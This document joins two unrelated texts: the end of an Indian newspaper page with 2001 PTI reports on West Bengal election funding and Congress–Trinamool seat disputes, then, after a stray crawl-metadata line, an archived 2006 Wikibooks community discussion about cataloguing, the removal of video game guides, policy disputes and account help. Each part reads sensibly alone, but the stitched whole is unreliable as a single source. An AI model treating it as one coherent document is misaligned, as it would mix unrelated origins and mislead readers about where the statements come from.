He further alleged that TC
is taking funds from corporates and business houses for
electioneering. "The way Trinamool has embarked on
huge spending on cutouts and posters is quite
amazing," he said.
"We would like to
know from them the sources of their funds. Where from are
they getting such huge funds to spend on cutout and
banners?" Biswas said.
Explaining CPI(M)s
position, Biswas said, "our members contribute to
party fund and even now a fund collection drive was going
on. Only last week we had organised a mass collection
drive in districts and more such drives would be
undertaken before the coming elections."
The Left Front today
released a joint appeal by Jyoti Basu, the WB Chief
Minister, Buddhadev Bhattacharya, and leaders of other
front constituents, asking the electorate to vote for the
front candidates in the assembly election in the State.
(PTI)
Ghani still adamant
MALDA,
Apr 14 :
Veteran Congress leader A B A Ghani Khan Chowdhury today
reiterated his stand that his party would never concede
the two contentious seats of Englishbazar and and
Harishchandrapur to its new poll ally Trinamool Congress.
Ruling out any such
concession to the Trinamool, the MP from Malda told
newsmen that Gautam Chakraborty would be fielded as his
partys nominee from Englishbazar and Mostaq Alam
from Harishchandrapur.
The Trinamool Congress,
which released its list of contestants yesterday, has
claimed that it would put up its candidates from both the
seats falling within Chaudharys native Malda
district, but has not announced the names of party
candidates so far.
Chowdhury, however, struck
a conciliatory tone on old Malda, saying discussions were
being held with the party high command on the
Trinamools request for the seat.
The senior Congress leader
refused to attach any importance to the Congress Bachao
Committee floated by three dissident party MLAs, and
claimed that they did not have the ability to weaken the
party.(PTI)
| home | state | national | business| editorial | advertisement | sports |
| international | weather | mailbag | suggestions | search | subscribe | send mail | | http://www.dailyexcelsior.com/01apr16/news.htm | crawl-002 | refinedweb | 5,622 | 53.44 |
Wikibooks:Reading room/Archive 18
From Wikibooks, the open-content textbooks collection
Card Catalog Office and other sidebar issues
I'm not sure this is consistent with the best way of searching for things and the discussions regarding categorisations above (although I do appreciate that a lot of effort, particularly Rob's, has gone into it). I do wonder though whether it has a future, and even if it does, whether it is really worthy of being linked to in the sidebar. Indeed, to my mind, the sidebar needs a bit more reorganisation, putting the links to community pages down a bit, and perhaps renaming the "all bookshelves" and "all books" bits as "search by subject" and "search alphabetically" instead, Jguk 18:29, 18 April 2006 (UTC)
- Yes, unless categorization in the card catalog office is forced (via a {{cleanup-link}}-esque template) and {{Catalog}} is used, I think the card catalog office should be scrapped altogether. (Imagine if a library only had a random half of its books catalogued.) As for the sidebar, I think that having both a "tools" and a "toolbox" section is redundant. --Hagindaz 23:05, 18 April 2006 (UTC)
- The whole point of the Card Catalog Office was to bring up the issues of organizing the content of Wikibook, and have a central discussion area that was seperate from the Staff Lounge where people who are interested in organizing the ontology of Wikibooks could occur. In that regard, I think it is still a valid project, but the problem here has always been trying to recruit people to be involved with the issue. If the CCO is a failed experiment, so be it. I still think major discussion about this issue needs to take place, and it will be an ongoing issue as well. And if the CCO is being scrapped, there should be something to take its place. If you don't think finding content on Wikibooks is a problem, and that Special:Allpages is the best solution, go ahead and scrap the CCO and the idea.
- I am opposed to a monolithic ontology for Wikibook, and the category system of MediaWiki software is also inadequate for cataloging Wikibooks as well. Much of the problem I've been facing is to simply identify what is a Wikibook, which is precisely why I started Wikibooks:Alphabetical Classification. If you are complaining about how slow I've personally been in trying to catalog Wikibooks, you are operating on far too short of a timespan here. This is something that is going to take time, and I've been deliberately moving slow to make sure that I've covered the major issues, as well as to identify the tools necessary to deal with the task. It is a huge task to try and catalog anything, and with almost 15,000 pages of content and no real organization at the moment, the task for the current Wikibooks content alone is in reality something more than one person can deal with on their own. --Rob Horning 09:33, 19 April 2006 (UTC)
This section has temporarily been suppressed. I have started moving some info from WP and modifying it - but it needs quite a bit of improving. Also, many pages currently in the Wikibooks namespace, more properly belong in the Help namespace and should be moved there. If people have ideas on how to improve it, please just go ahead, or note the ideas here for discussion, Jguk 18:29, 18 April 2006 (UTC)
Any help, Robin? :) Jguk 19:44, 18 April 2006 (UTC)
request help
I am begining to see the challenges of working here at wikibooks. I have to confess that I'm a POV warrior, but I am trying to reform. I keep finding myself with serious writers block. I think my biggest problem is that subliminally, I'm still an info warrior in a solitary crusade against an army of trolls. I keep trying to solve this problem by imagining Jimbo Wales as the guy I am writing to. This works some, but Jimbo Wales is pretty absent from my process, and haunting his discussion page doesn't really put me in touch with his head as much as it makes me realize that lame people are everywhere. I had a big brain storm yesterday. I was happy and proud of myself for writing a few pages in as many hours for the first time. Until i went and looked at it this morning. Its a big phat POV nightmare. Honestly, as such things go, its more factual and truthful than almost any other POV nightmare, but its still not even something I'd normally want anybody to see here. My original idea was to vanish it and start over, but theres a lot of good points, and, I think that even the pov pionts could be considered as good starting points. What I guess i am looking for is a compassionate NPOV coach, somebody to help me draw those lines, and to help me frame my reference point in my head for who and how i should be writing.
If anybody has the spare time and energy, I'd appreciate some feedback. Please know that I have no intention of leaving the big mess up any longer than it takes to fix it. Prometheuspan 18:46, 19 April 2006 (UTC)
Wikiversity status change?
I noticed Wikiversity has been removed from Wikibooks main menu. Has the Board finally moved to approve/disapprove Wikiversity or is this unilateral action by some Wikibookean at large? Lazyquasar 09:35, 20 April 2006 (UTC)
- I think this is a (hopefully temporary) cock-up by the developers, who are tested out something new with the sidebar. Somehow our sidebar, which remains unchanged on MediaWiki:Sidebar, has been replaced by that of the English Wikipedia! I hope normal service will be resumed shortly. I also hope that Wikiversity makes a proper go of it at Wikibooks and the proposed schism gets put to rest, Jguk 10:09, 20 April 2006 (UTC)
- There is nothing on the part of Wikibooks administrators to formally remove Wikiversity from Wikibooks in any significant manner, and I would fight that until was live, or some significant alternative was presented. There was a substantial server crash that happened yesterday with the english-language server farm and I think the developers are trying to recover from that incident, together with a huge crushing load of page requests. I suspect that the sidebar issues are a result of that issue as well, where they had to recreate some of the content from backups. If you made any substantial edits in the past couple of days, I would strongly suggest that you review your recent contributions to see if they made it into the current database. --Rob Horning 10:19, 20 April 2006 (UTC)
Categories Within Pages
Is there any way to include part of a page on another page, but not the whole page (possibly with using categories). For example, imagine a language book had 4 pages: Dialoges, Grammar, Vocabulary and Exercises- each with content organized by lesson and section. Could you create each section's page by including the grammar, dialoges, vocabulary and exercises from the 4 pages(dialoges grammar vocab and exercises)? Kind of like how US History/Print version was created, except taking only sections of pages instead of entire pages. DettoAltrimenti 11:03, 21 April 2006 (UTC)
- Use <noinclude>text to not include in transcluded page</noinclude> around text you only want to appear on the page itself, but not on the transluded page. To only include text on another page but not on the page itself, use <includeonly>text to include only on the transcluded page</includeonly>. That may be useful for titles or categories.
- If you want to include different sections of a page on different pages, you can use
<div class="{{switch|{{SUBPAGENAME}}|case: Dialogues=|case: Lesson 1=|default=hiddenStructure}}"> text to only appear on pages titled "Language/Dialogues" and "Language/Lesson 1," but not on any other page </div>
--Hagindaz 13:47, 21 April 2006 (UTC)
weird glitch
don't know where to go to report this. Its happening on wikibooks and wikipedia. When i go to log in, the entire user options bar jumps sideways. In fact it tends to do this whenver i put my cursor over the general area??????? -perplexing- Prometheuspan 02:39, 22 April 2006 (UTC)
Prometheuspan My talk Preferences My watchlist My contributions Log out
keeps hopping to the left side of the screen.
Wikibooks is not a depository for video game manuals
This is an instruction that Jimbo has added to Wikibooks:What is Wikibooks [1]. He has also noted this on Wikibooks talk:Computer and video games bookshelf, where he has made it clear that, although time would be allowed for the video game manuals we have to be moved elsewhere, that they really do not belong on Wikibooks. It also seems that his thinking is that Wikibooks's scope really should be textbooks for educational reasons.
Because of the terms of WMF's educational mission charter, it seems that we have no choice on this. Personally, I must say that (even ignoring WMF's educational mission charter) I would agree with Jimmy - Wikibooks should be for textbooks, which to my mind means books that encourage or aid learning (for school, university, profesionals or for the kind of subjects you see in adult learning courses, such as cookery or flower arranging, or what have you). Video games walkthroughs quite simply do not belong.
I think we should agree a cut-off date after which video games walkthroughs will be deleted - a generous one, perhaps the end of July, say. This would give plenty of time to allow them to find a new home, whilst also making it clear that they will be removed. In isolated cases, for exceptional reasons, any deadline chosen could be extended - but the message would be that we are serious about removing them, please move your work elsewhere (could wikicities help?), you have plenty of time to do this, but do move them or your work will be lost.
In the meantime, I propose that any new video game walkthroughs that are started are speedy deletion candidates, with a requirement that a note be placed on the author's page explaining our new approach. Discussion of this proposal can be on Wikibooks:Deletion policy, Jguk 06:03, 22 April 2006 (UTC)
- Finally! That's good news. While I'm impressed by the depth and quality of the guides we've amassed, as textbooks they all fall flat. But this is going to be a big effort. There are many things to do now. I wonder though, what's the best way to transwiki? I assume a database dump could be downloaded and then installed on the new host server, or is cut-'n'-paste with a history list still the best way? If a database import isn't viable I can get onto contacting authors and transwikiing content right away. I suggest that rather than expect the authors to find their own hosts that they all be moved to StrategyWiki. From there the authors can contribute or fork off to their own server as they please, and it would mean Wikibooks could be emptied by the due-date without worrying over books that didn't get dealt with in time. In closing, yay! :) GarrettTalk 08:42, 22 April 2006 (UTC)
A number of points regarding your suggestion (which on the whole seems like a great solution):
- Is the licensing of submissions to StrategyWiki compatible with the licensing used for submissions to Wikibooks?
- Assuming the answer is yes, would StrategyWiki accept the material? (we could easily ask them that)
- We'd then need to agree with StrategyWiki how to transfer material (assuming we've dealt with 1 and 2 this should be possible, but I wouldn't want to introduce lots of material to StrategyWiki en masse in a way that disrupts what they're doing).
- Presumably once transwiki'ed (however that is achieved) we can delete each book here straightaway - though we probably ought to offer a link from the title page of each book to the StrategyWiki page for a period (a year say) so that anyone looking for it here can find it on StrategyWiki.
Finally, I have never seen StrategyWiki before. Visually it looks excellent, much better than what we've got here at Wikibooks. And it all seems to be on MediaWiki. I'm jealous. How do we get the appearance of Wikibooks to look equally excellent? Jguk 09:18, 22 April 2006 (UTC)
- Both are GFDL, so it's all go in that respect. :)
- In the past they've expressed an interest in receiving WB content (and also began copying over the ever-popular Grand Theft Auto: San Andreas guide). I've mentioned this policy change over there so they can reaffirm their opinions.
- As long as each book conforms to the subpage structure it shouldn't be too hard to manage.
- Sounds like a good plan, as there are bound to be some incoming links for a while yet (especially from fansites and outdated WP mirrors)
- As for the visual theme, you just need time and artistic talent. :) MediaWiki skins are merely CSS stylesheets, and adding new ones is basically drag-'n'-drop. Another good example of an unrecognisable MediaWiki install is the Elder Scrolls Construction Set Wiki. GarrettTalk 10:54, 22 April 2006 (UTC)
Where do you drop them into? Also, what do you need to design them? Jguk 17:30, 22 April 2006 (UTC)
- Anyone with access to the server can dump them into the skins folder (and also have to add a line or two to a PHP file, I think). If you were to replace an existing skin however this can all be done from the MediaWiki: namspace. All you need to design them is CSS knowledge, no special tools really. GarrettTalk 21:50, 22 April 2006 (UTC)
So what about the other game manuals?
What about the Go, Chess and other game manuals on this site? Aka the Wikibooks:Games_bookshelf? Video Games may have a "bad rep" in the press, for I dunno whatever reason. :-/ But if this is going to be done, we need total consistancy. Nonetheless, it will be difficult for me to hang around this site if the game manuals are gone. It is no offense to Jimbo's decision, nor should this be taken as an act of resistance. His decision is his decision. At this point, no amount of disagreement can change the fate of these books.
Well, anyway. If normal games are to stay but if video games are removed... then this motion may have a little resistance. Convincing everyone that video games are not allowed while normal games are allowed is too difficult.
Other issues I see is convincing the Wikipedia community that Video Games are no longer allowed on this site. Somehow, that must be arranged (as far as why video games are allowed on wikipedia, but not wikibooks... but thats another story). --Dragontamer 17:56, 22 April 2006 (UTC)
- Thus I removed the new policy.
- We need to have "wide acceptance among editors" (perhaps excluding editors of things that belong not at Wikibooks) before we can change WB:WIW, especially because the current version of WB:WIW does allow game manuals such as Go, Football (Soccer), and MapleStory, because they are "instructional resources". We might still be able to remove B:CVG guides (and maybe some others), but we need to discuss it first. --Kernigh 21:31, 22 April 2006 (UTC)
- Video game guides are to be removed (Jimbo capitalized "must" afterall). That's been decided on and no amount of discussion by us will change the foundation's decision, so I don't see why you have removed the policy. Now the difficult question to answer is how far do we go from there. Is the Wikibooks Pokédex, whose sole justification for keeping being that if game guides were accepted, it should be too, to be deleted? But regardless, video game guides are gone. --Hagindaz 23:31, 22 April 2006 (UTC)
Jimbo's expressed his thoughts in more detail in this textbook-l posting. GarrettTalk 21:50, 22 April 2006 (UTC)
In reply to Hagindaz, even if we are sure that we will remove video game guides, that does not mean that we are sure about the policy. Instead of banning all video game guides immediately, maybe we should take transitional steps. --Kernigh 02:09, 23 April 2006 (UTC)
- Well of course. That's obvious and exactly what Jimbo recommended. But, a policy against the creation of new guides should in place if indeed "we are sure that we will remove video game guides," though the existing guides should be kept as long as needed. --Hagindaz 02:37, 23 April 2006 (UTC)
Hey, say, what happened to my earlier comments? They just up and went vanished and i can't even find them in the history?
My points were pretty good ones i thought.
Lets see. RE-construct.
Yes, I agree it is a bog change seemingly. However, the definition of the place is "textbooks." Reading below i get more information, which is nice. Apparently that wasn't the initial total intention of the conceptual inventor of Wikibooks.
However, my point earlier is that how to play video games doesn't really match the mission statement here is still true for really the same reasons. If, at long term expansion, 20 years from now the library was well founded and big and large and complete, the operational functional umbrella would expand that large. The problem is that Wikibooks is barely meeting the mission statement, and that bookshelf is getting crowded. Wheres the textbook on how to write a video game? Or on how to think in three dimensional coding? Or how to program a 3 dimensional model? Those are the kinds of books we need, and without them, the problem is that Wikibooks ends up being a kiddie zone.
(This isn't a recontruction, i have new information..drat.)
But still, the same point is essentially true. People come here in good faith and see an opportunity to write something. But maybe over the long term they fail to make it neutral or its too pov, or its fiction, etc. If it meets some realistic criteria, we ought to keep it but shelve it on a shelf that is useful. There are dozens of books probably on Wikipedia that wouldn't cut "TextBook." We don't need to delete them, and, it might even be true that we don't need to move them. But they do need to exist in a place that is organized for them, and to fit into a macro which implies a library, not a game museum.
There are several Books we should keep that are POV encumbered. I can think of two examples off the top of my head. The "Asperger Survival Guide" and the "Universal Religion" Texts. The first is POV as its written by a magickal thinking asperger syndrom person. The funny thing is, it is exactly the kind of reference material a pro would die for in order to both help Asperger Syndrome folks and to generate an annotated study of Asperger type thinking. POV in this case means GOLD MINE. "Universal Religion" was a good faith attempt but a half lucid follow through. Its POV biases are train wreck accidents and the Author isn't really a POV pusher by a long shot. I'd devote a week to showing how the starting premise is a good one and show how it could be a valuable NPOV text if it went up for deletion, because its a "half way there" sort of book that really just needs a fresh batch of neutrality-ification authors. Prometheuspan 21:04, 24 April 2006 (UTC)
Fiat decisions and the scope of Wikibooks
There are two very different visions that I see regarding Wikibooks, from two very different people as well. One is from the "founder" of Wikibooks, Karl Wick. I can't speak for him directly, but in many various places he has expressed a much more inclusive attitude toward what can appear in Wikibooks. For myself, I feel that if you have a subject that is in Wikipedia, but it can be covered in much more depth and detail than a typical 32K article, it can become a Wikibook. That removes the original research problems and would largly fit with what is currently in the WB:WIN list except for specific changes that Jimbo has added in the past six months or so. In summation, Wikibooks is for books and major content that takes quite a bit of work to organize.
That is a great idea, and the broadness of the scope is a better umbrella. I think that "Fiction" and "Pov" booksehlves are really the best solution overall, but think of this in a social systems theory perspective like Jimbo. Its not that we don't love a bunch of games, but we need to narrow the focus of our filter in order to generate the minimum bare bones product. Most of the books on Wikibooks are not only unfinished, they sort of look like maybe a batch of teenagers started the project and then promptly abandoned it. This is a systemic problem, and limitation of scope is one way of resolving that systemic problem as a information systems engineer. Prometheuspan 21:04, 24 April 2006 (UTC)
The other school of thought is that Wikibooks is only for strictly textbooks alone and nothing else. That would mean that even books like Serial Programming, which might be taught as a college subject but isn't very well cited or organized along a formal textbook lines with sample problems and student exercises would not qualify. In short just about everything here on Wikibooks. Or even more strict, if I can interpret what Jimbo seems to be saying about the content here, if it can't be found at a college bookstore then it shouldn't be here.
- Serial Programming is at least a topic proper for a textbook, and the fact that it is not yet a very good textbook is of course no grounds for deletion, but rather grounds for radical improvement. I am certainly not saying "if it can't fe bound at a college bookstore then it shouldn't be here". We are interested in creating a complete curriculum for Kindergarten through the University level. The proper question is: is this a textbook for a course taught in some accredited institution? --Jimbo Wales 13:34, 8 May 2006 (UTC)
Prometheuspan 21:04, 24 April 2006 (UTC) I really don't like that as a school of thought, and, I hope that isn't what Jimbo is actually saying. I think that it might be a sort of accidental hyperbole of the other school of thought; this is my interpretation of the other school of thought. Wikibooks needs to focus on making it as a library in order to attract cyclically the kind of people who will improve it as a library. If wikibooks becomes by means of content something other than a library, it will fail in the end as a useful information resource. The idea here isn't to absoluetely exclude what isn't a textbook, it is to focus all current efforts on what wikibooks has to do in order to insure its viability as an information service.
I believe this to be way overly restrictive, and I can't really be used to judge any content that would fall under even some moderation between these two schools of thought.
Prometheuspan 21:04, 24 April 2006 (UTC) If that were the actual other side, I would agree, it does seem overly restrictive. If it were even as much as a permenent rule, rather than an information service engineering tactic, I'd see it as a self debilitating limitation for a any information service labeling itself a library. I hope that my interpretation of the other point of view is closer to it than your interpretation of it, because i think therein lies the compromises we are looking for.
More to the point, if this is something that Jimbo has been gnawing at his mind for some time (as apparently it has), I wish he would come out and say it. If he were still paying for these servers completely out of his own pocket, I might be willing to say that he has the authority to do this huge policy shift, but he isn't and IMHO doesn't. I guess we can't overcome a forced Wikimedia Foundation Board policy decision on this matter, but then again I think such a heavy handed approach is going to be something that will be highly detrimental to this project. And some of the current board members, notably Anthere, feel we are being way too restrictive on the content already with Wikibooks. If we were restrictive before, you have only just seen this get started.
- As far as I am aware, Anthere and I are in complete agreement about what should be in Wikibooks.--Jimbo Wales 13:34, 8 May 2006 (UTC)
- If you and Anthere were in agreement, there wouldn't have been a fight over the Wikimania proceedings being placed on Wikibooks, nor would it have even been put on Wikibooks in the first place. Generally speaking the attitude in the past by many users, including both Anthere and Angela, was to be inclusive for the most part as long as it was kept within GFDL guidelines and was generally speaking book content. --Rob Horning 23:42, 8 May 2006 (UTC)
Mind you, as I've pointed out numerous times and in numerous places, less than 1/2 of all Wikibooks content is even in English. If such a fiat decision is going to be made, it will also have to be enforced not only on en.wikibooks but on all Wikibooks projects. IMHO such a major policy change (and there are video game guides for the other language Wikibooks) should involve more than even this one project as well. I'll admit that the other language Wikibooks usually use en.wikibooks as a "template" to see what some general policies ought to be, but there already are some interesting differences in general policies between the various languages already. I'm sure Derbeth could give some examples between pl.wikibooks and en.wikibooks, and pt.wikibooks (a language I speak) has a policy that excludes controvercial religious books that we allow on en.wikibooks.
- There have been no fiat decisions here! I have merely pointed out that we have always had policy, and the policy has not been well-enforced in the past. Wikibooks has been the victim of some well-meaning wikipedians sending junk over here. Do not allow yourselves to become a dumping ground.--Jimbo Wales 13:34, 8 May 2006 (UTC)
- You had better believe this is a fiat decision. You went to WB:WIW and deliberately made a specific policy change to exclude over 100 different Wikibooks. Some of these have been started here on Wikibooks during this time when we have had a full bookshelf (a Wikibooks organizational division) created just for this content. It wasn't as though this was something that was added without Wikibooks users knowing about it unlike the Wikimania proceedings. While I have been one who has complained about Wikipedia dumping content on Wikibooks, this was not it, and this has not been widespread policy until now. The debate over removing these books has been a lingering debate here, and it is my perception that one of those anti-video game guides proponents finally got you to side with them effectively ending the debate and giving rationale to act on a massive scale. Wikibooks has been diminished as a result of this effort, and will IMHO be permanently damaged due to this action. I still fail to see any rationale on your part Jimmy as to why this policy change was made other than you simply felt like making the change. Thousands of hours of honest work have been destroyed and a significant group of Wikibooks users alienated and have been told to leave because of this action. Vandals couldn't have been any worse in this regard. --Rob Horning 23:42, 8 May 2006 (UTC)
I welcome the debate over keeping or removing video game guides on Wikibooks, but this should be done through a legislative process and not through some executive order. And it should be a policy that gets input from all Wikibooks projects, not just en.wikibooks as well. I'm using the term legislative process as a way to say we need community concensus on this issue, but it should be way more than a couple of people saying "Yeah, let's do it" with perhaps one lone person saying "er... it might not be so good of an idea".
My personal "political" stand on this issue is that video game guides should remain. I've added some key points in Wikibooks talk:Game manual guidelines#For (Wikibooks should include game guides) including specific university-level curriculum that is currently being taught about this topic, and classes that indeed do study Doom as a classroom topic. That is a seminal video game and is going to be studied 100 years from now because of how groundbreaking of a video game it was. Just as Birth of a Nation is studied in university classes as a seminal motion picture today. In addition, and policy that "makes sense" is going to have to be more inclusive or exclusive over content than simply video games, and is going to have to hit the core of What is Wikibooks to see if this really is just textbooks or if it is for other non-fiction works as well. And how we define the term textbook. --Rob Horning 01:22, 23 April 2006 (UTC)
- Rob, I think you misunderstand what Jimbo is doing. He is responsible, as head of the Wikimedia Foundation, for making sure that WMF resources are used in line with its charter, ie its educational mission. If he did not do that he would be neglecting his role and, ultimately, putting WMF's non-profit status in jeopardy. From time to time, this does need executive order. I also think he appreciates that in practice wikibooks has allowed video games walkthroughs for some time and therefore we should give them plenty of time to arrange their departure from wikibooks to what I hope is a welcome home that will allow them to continue to develop.
- I also think that what Jimbo is asking for is that we really do enforce the bit in WB:WIW that says "As a general rule, most books you might expect to find in the non-fiction section of your local library or bookshop are not acceptable because of the list of exclusions in this policy. This is for textbooks. A textbook is a book which is actually usable in an existing class." Do, however, give "existing class" a wide meaning as being in any accredited institution (ie don't restrict it to school). I'm sure that if you can show that a subject is studied in an existing class, and does have/need textbooks similar to a wikibook, that wikibook will remain, Jguk 06:25, 23 April 2006 (UTC)
- I am not misunderstanding this... or a huge misunderstanding perhaps. I do understand his role as "head of the Wikimedia Foundation", but its charter was written after the fact... and well after Wikibooks was established as a project and these video game guides were already on Wikibooks. This is not going to put the WMF's non-profit status in jeapordy in the least. This is a pure political move on the part of Jimbo to try and narrow the focus of Wikibooks, and he is using his position as chair of the WMF as justification to change policies here without even so much as having a discussion about this before the policy has been changed. That is just plain wrong to do with a project like this... even if he were even contimplating such a policy change.
- I also fail to see where the motivation is to remove an entire bookshelf of almost 100 different Wikibooks is coming from. If this is to remove one specific Wikibook that is perhaps a bit too much, such as he did with the Jokebook, perhaps I could agree or disagree but it could also be dealt with through the VfD pages. And was. In this case he is making a huge policy shift in the project without consultation of any of the rest of the Wikibooks community and expecting us to try and divine his thoughts on why it was done... without any comment occuring that is of any substantial depth or justification and instead relying on apologists to deal with the consequences.
- BTW, as far as video game development and study, I can give not only existing university classes that not only give instruction on these topics, but go into depth and even grant degrees in video game design. And these are not two-bit psuedo colleges either but otherwise widely respected major universities. The video game industry is now larger than the movie industry in terms of economic impact in the USA alone (it passed sales of movie tickets & video sales some time in 2004). It is certainly going to be having over time some colleges that will be doing things like the USC Film School is doing for the motion picture industry. The point here is that I fail to see why an entire bookshelf needs to be abandoned and all of the contents of all of the books deleted... especially on a decision that was not debated previously. --Rob Horning 12:29, 26 April 2006 (UTC)
- I agree with Rob here. Jimbo Wales needs to at least point out why this decision came out of the blue like this. Should we just sit still and silently get rid of 100+ books on this site without a discussion? Again, I point to Jimbo's edits. I have been watching this page in hope that he will give some sort of explanation to the issue. But just looking at his edit page, it makes me feel as if Jimbo isn't a participant in this community at all, a quality that should exist in an executive don't you think?
- Heck, I thought as a community, we went over this already and settled that game guides *were* allowed on Wikibooks. And as such, we developed Wikibooks:Game_manual_guidelines. That page existed since early November, and the issue was discussed and I felt at least the issue was closed.
- If Jimbo had an issue with the game guides, why didn't he talk about it when that guideline was being made? Why is it now, when the issue has been closed for 5+ months, that Jimbo says no, and the community has already moved on? --Dragontamer 16:25, 29 April 2006 (UTC)
There's a difference between a strategy guide/walkthrough and a book that examines the aspects of game design in a game. Because video games are unique in that they combine several art forms, the latter can easily be done, and without having any elements of a how-to book/strategy guide. Studies on novels, for example, have been written that are longer than the book they are about, aren't simply plot summaries, and are used in literature and writing classes. I see this as being similar to the difference between Muggles' Guide to Harry Potter and a Wikibook on a classic or revolutionary book. "Muggles' Guide" simply lists characters and summarizes chapters. And, like most video games, Harry Potter isn't anything special in its language or themes, so you wouldn't be able to write a book for classroom use.
Unless I'm forgetting a huge chunk of books, the books currently being hosted on Wikibooks fall into three divisions:
- Books that are, by any sense of the word, textbooks
- About topics taught in classrooms
- Structured in a way that wouldn't make sense for an encyclopaedia on the subject
- No question on what to do with these, obviously
- Guides/how-to books
- Would for the most part never be part of a school curriculum (though there is a small grey area)
- Video game strategy guides/walkthroughs and a book of recipes fall into this category
- May be popular enough to form their own project. See m:Talk:Proposals_for_new_projects#Proposal:_WikiHowTo
- Related encyclopaedic content
- Books like Wikibooks Pokédex and Muggles' Guide to Harry Potter (and possibly Serial Programming in its current form)
- Only purpose would be to serve as appendices (which has been argued in the case of the Pokédex)
I think most of the disagreement is over how-to books, which are instructional resources, yet are not used in classrooms. Whether Jimbo Wales has the right to limit Wikibook's scope to simply textbooks, despite significant support for the inclusion of all instructional resources, is something that I am very interested in knowing. Perhaps dividing Wikibooks into separate textbooks and how-to books projects would be the best course? --Hagindaz 04:24, 23 April 2006 (UTC)
- I think Jimbo's response to my queries on the mailing list (see [2]) is quite useful in this regard. Please read the email in full for the details.
I know i am a newbie aspie, but i do wish the humans would listen. I have said repeatedly that Wikibooks needs a "fiction" and "pov" Bookshelf. Honestly, this is the solution to most of this problem. Just let the users know they are getting into swampy stuff by putting it out in the backyard somewhere instead of featuring it. Prometheuspan 21:04, 24 April 2006 (UTC)
- The comments that you make regarding the school curriculum are too narrow. Jimbo notes "The key point is that there have to be some kind of courses offered by some kind of serious institution of learning." That does not mean it has to be on the school curriculum. Books supporting adult learning courses or professional courses are, of course, welcome. For instance, serious cookery classes for adults (or children) (and I mean for amateurs not professional chefs) use cookbooks in classes, and the cookbook is most welcome. This is significantly different from a video game walkthrough, where Jimbo says "My question would be whether or not there exist classes at accredited institutions on the subject which use something similar _as a textbook_." There are lots of types of "accredited institutions", and this is meant to be given a very wide meaning.
- In respect of the Pokédex, I have no idea whether Pokémon are now so big as to mean accredited institutions study it - in which case a serious study guide in line with an example syllabus would be within the allowed limits. If not, then we shouldn't have it. To my mind "How-tos" are largely micro-books and would be merging into a single how-to textbook on "life" (and I'm sure some sort of "general studies" or "citizenship" type classes cover much of this material anyway), Jguk 06:17, 23 April 2006 (UTC)
- So what about video games like W:America's Army and W:Marine Doom? And then W:Brain Age that *really* blur the line of this new policy?--Dragontamer 16:26, 23 April 2006 (UTC)
- That's wikipedia, not wikibooks. Wikipedia meets the educational mission of WMF by being an encyclopaedia, and it's reasonable to have articles on those games in an encyclopaedia. Wikibooks is for textbooks, the same or similar to textbooks used by learning institutions, Jguk 19:05, 23 April 2006 (UTC)
- As per my reccomendation, I've copied this (thread of) discussion to the WB:WIW talk page. Go there for my responce. --Dragontamer 15:42, 24 April 2006 (UTC)
hey, like, you could in theory write an educational style textbook using a game as a hyper reference. The book would have to be about how to program etc. Not the game as its primary subject tho. See the difference? Prometheuspan 21:04, 24 April 2006 (UTC)
Lets centralize this discussion in WB:WIW talk page
It is getting confusing. It feels as if I'm saying the same thing here and on that page. This issue really hits the core of WB:WIW anyway, so we can leave the Staff Lounge for any other developments. Also, it helps if we all are on the same page on this discussion. (no pun intended)--Dragontamer 16:26, 23 April 2006 (UTC)
- To aid discussion (and no more) I have created the page Wikibooks:Books possibly in contravention with WIW as a first shot at what books may have to be moved (although I note straight off that I imagine some of these will remain). I have also consolidated Jimbo's comments on the matter at Wikibooks:Comments from the President of the Wikimedia Foundation, Jguk 21:31, 23 April 2006 (UTC)
Wikibooks: No personal attacks policy changed from "enforced" to "proposed" again!
Jguk archived the discussion of this item on the 24th then changed the policy from enforced to proposed again! See Archived discussion where for about 2 weeks no one demurred from the policy being enforced. Perhaps it was only after archiving the discussion that he spotted the change to "enforced" status. RobinH 08:23, 24 April 2006 (UTC)
Proposal to restore "enforced" status to Wikibooks: No personal attacks - why we need a limited constitution and enforcement apparatus
A vote was taken at Wikibooks: No personal attacks and 10 users voted. This is a high number by Wikibooks standards. 8 of the 10 voted for the policy to be enforced. Surely reopening the issue after a vote (and several months) cannot be reasonable. I propose that the policy should be restored to enforced status.
The fact that a vote has been overturned unilaterally in the manner described is a graphic demonstration of the need for a limited constitution in the form of enforced policies and an enforcement apparatus.
At Wikibooks:Policies and guidelines there are several proposed policies that require review. The most important of these is probably Wikibooks:Ad hoc administration committee so that enforced policies can be enforced. RobinH 10:38, 26 April 2006 (UTC)
Somethings happened to my account
I've not been on wikibooks for a while and I think that possibly my account has been disabled. I can't log in, and emailing for a new password doesn't seem to work either. I've had this new account (note the capitalisation). The problem is however my admin privaledges. I run a computer club here at my school and starting on wednesday intend to get the kids to edit a new wikijuniour book of science experiments that can be done at home. The problem is that this school is on a huge shared network that regulaly gets blocked from Wikipedia because of vandals from other schools. I need to be able to unblock the network so that my (lovely, well behaved) pupils can edit (and reblock when we have finished if necessary). I also need to be able to delete pages created in error (my pupils are only 11, I expect a lot of errors). Are there any stewards here? Can someone give me admin powers on this account or reactivate the password on my other account? Theresa Knott 10:03, 24 April 2006 (UTC)
- Hm. A while back it was decided to de-admin inactive sysops, but you don't seem to be on that list. Anyway it could be that removing your powers somehow glitched your whole account. I'm not sure about stewards, but I'm pretty sure beaureucrats can give sysop status too. In which case try Dysprosia or Derbeth. Hopefully they can fix whatever's wrong. GarrettTalk 12:18, 24 April 2006 (UTC)
- Thanks it is all sorted out now. It was the email confirmation thing that was causing the problem. Theresa knott 14:29, 25 April 2006 (UTC)
Wikibooks:Bulletin board updated
I am planning to add more longer texts, vaguely similar to Wikisource:News, to Wikibooks:Bulletin board. I have started with:
- Local CheckUser status in doubt
- Potential consensus to remove computer and video game guides
--Kernigh 02:52, 25 April 2006 (UTC)
- Great! Definitely a way for people to keep up to date at a glance without having to read the actual discussions themselves (which in thes two cases are especially confusing). GarrettTalk 05:12, 25 April 2006 (UTC)
Cookbooks categorisation system
Hello,
Is there a staff lounge specifically for Cookbooks? I couldn't find one. (Like maybe, hmm, Cookbook:Kitchen? :))
I wanted to ask what the story is with cookbooks categorisation. I've spent a fair bit of time at Commons and they're (necessarily) pretty strict about categorisation norms. I started 'fixing' a bunch of pages then realised it might not be appropriate. Is there guidelines anywhere?
How is Cookbook:Recipes (the index) kept up to date? Is there a way to see all the recipes, or is the best bet Special:Allpages?
Thanks, pfctdayelise 12:32, 26 April 2006 (UTC)
- ...Anyone? pfctdayelise 01:30, 28 April 2006 (UTC)
Try Talk:Cookbook. --Kernigh 04:13, 28 April 2006 (UTC)
